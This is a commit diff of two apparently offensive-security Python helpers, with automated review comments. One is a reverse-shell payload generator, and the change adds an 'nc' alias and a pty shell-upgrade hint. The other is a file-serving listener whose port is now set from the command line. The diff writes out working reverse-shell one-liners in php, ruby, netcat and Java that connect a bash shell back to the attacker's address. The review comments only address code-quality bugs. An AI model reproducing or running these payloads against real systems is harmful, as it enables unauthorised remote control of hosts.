Rev Shell tty, upload file variable port
parent
a0476d4c17
commit
fa84b17e4f
@ -27,7 +27,7 @@ def generatePayload(type, local_address, port):
|
|||||||
return "php -r '$sock=fsockopen(\"%s\",%d);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" % (local_address, port)
|
return "php -r '$sock=fsockopen(\"%s\",%d);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" % (local_address, port)
|
||||||
elif type == "ruby":
|
elif type == "ruby":
|
||||||
return "ruby -rsocket -e'f=TCPSocket.open(\"%s\",%d).to_i;exec sprintf(\"/bin/bash -i <&%d >&%d 2>&%d\",f,f,f)'" % (local_address, port)
|
return "ruby -rsocket -e'f=TCPSocket.open(\"%s\",%d).to_i;exec sprintf(\"/bin/bash -i <&%d >&%d 2>&%d\",f,f,f)'" % (local_address, port)
|
||||||
elif type == "netcat":
|
elif type == "netcat" or type == "nc":
|
||||||
return "nc -e /bin/bash %s %d\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc %s %d >/tmp/f" % (local_address, port, local_address, port)
|
return "nc -e /bin/bash %s %d\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc %s %d >/tmp/f" % (local_address, port, local_address, port)
|
||||||
elif type == "java":
|
elif type == "java":
|
||||||
return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port)
|
return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port)
|
||||||
@ -48,10 +48,11 @@ if __name__ == "__main__":
|
|||||||
|
|
||||||
if payload is None:
|
if payload is None:
|
||||||
print("Unknown payload type: %s" % payload_type)
|
print("Unknown payload type: %s" % payload_type)
|
||||||
print("Supported types: bash, perl, python[2|3], php, ruby, netcat, java, xterm")
|
print("Supported types: bash, perl, python[2|3], php, ruby, netcat|nc, java, xterm")
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
print("---PAYLOAD---\n%s\n---PAYLOAD---\n" % payload)
|
tty = "python -c 'import pty; pty.spawn(\"/bin/bash\")"
|
||||||
|
print("---PAYLOAD---\n%s\n---TTY---\n%s\n---------\n" % (payload, tty))
|
||||||
|
|
||||||
if payload_type == "xterm":
|
if payload_type == "xterm":
|
||||||
print("You need to run the following commands (not tested):")
|
print("You need to run the following commands (not tested):")
|
||||||
|
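Review bot: The new `tty` string in the `__main__` hunk opens a single quote after `python -c` and never closes it, so the hint printed under `---TTY---` is an unterminated shell command as written. The literal should end with the closing quote: `tty = "python -c 'import pty; pty.spawn(\"/bin/bash\")'"`. In the first hunk, `type == "netcat" or type == "nc"` would read more clearly as `type in ("netcat", "nc")`, and the parameter name `type` shadows the builtin. Both `generatePayload` and the `__main__` block continue outside the visible hunks.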
@ -3,7 +3,7 @@ import sys
|
|||||||
import netifaces as ni
|
import netifaces as ni
|
||||||
|
|
||||||
if len(sys.argv) < 2:
|
if len(sys.argv) < 2:
|
||||||
print("Usage: %s <file>" % sys.argv[0])
|
print("Usage: %s <file> [port]" % sys.argv[0])
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
# Create a TCP/IP socket
|
# Create a TCP/IP socket
|
||||||
@ -14,16 +14,17 @@ interface = "tun0"
|
|||||||
if not interface in ni.interfaces():
|
if not interface in ni.interfaces():
|
||||||
interface = ni.interfaces()[0]
|
interface = ni.interfaces()[0]
|
||||||
|
|
||||||
|
|
||||||
addresses = ni.ifaddresses(interface)
|
addresses = ni.ifaddresses(interface)
|
||||||
address = addresses[next(iter(addresses))][0]["addr"]
|
address = addresses[next(iter(addresses))][0]["addr"]
|
||||||
|
|
||||||
# Bind the socket to the port
|
# Bind the socket to the port
|
||||||
server_address = (address, 8888)
|
port = 8888 if len(sys.argv) < 3 else int(sys.argv[2])
|
||||||
print('starting up on %s port %s' % server_address)
|
server_address = (address, port)
|
||||||
sock.bind(server_address)
|
sock.bind(server_address)
|
||||||
|
|
||||||
sock.listen(1)
|
sock.listen(1)
|
||||||
|
print("Now listening, download file using:")
|
||||||
|
print('nc %s %d > %s' % (address, port, os.path.basename(FILENAME)))
|
||||||
|
print()
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
# Wait for a connection
|
# Wait for a connection
|
||||||
|
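Review bot: The new `port = 8888 if len(sys.argv) < 3 else int(sys.argv[2])` line takes the argument unchecked, so a non-numeric value ends in a `ValueError` traceback and an out-of-range one only fails later at `sock.bind`. Parse it inside a `try`/`except ValueError` and reject anything outside `1 <= port <= 65535` with the usage message before binding. The added download hint calls `os.path.basename(FILENAME)`, but only `import sys` and `import netifaces as ni` are visible in the hunk context, so confirm `os` is imported. The commit also drops the old `starting up on ...` line, and the new hint prints `address`, which may not be an IP if the first address family returned by `ni.ifaddresses` is a link-layer one (inferred from the context lines, not changed here). The script body and the `while True:` loop continue outside the hunk.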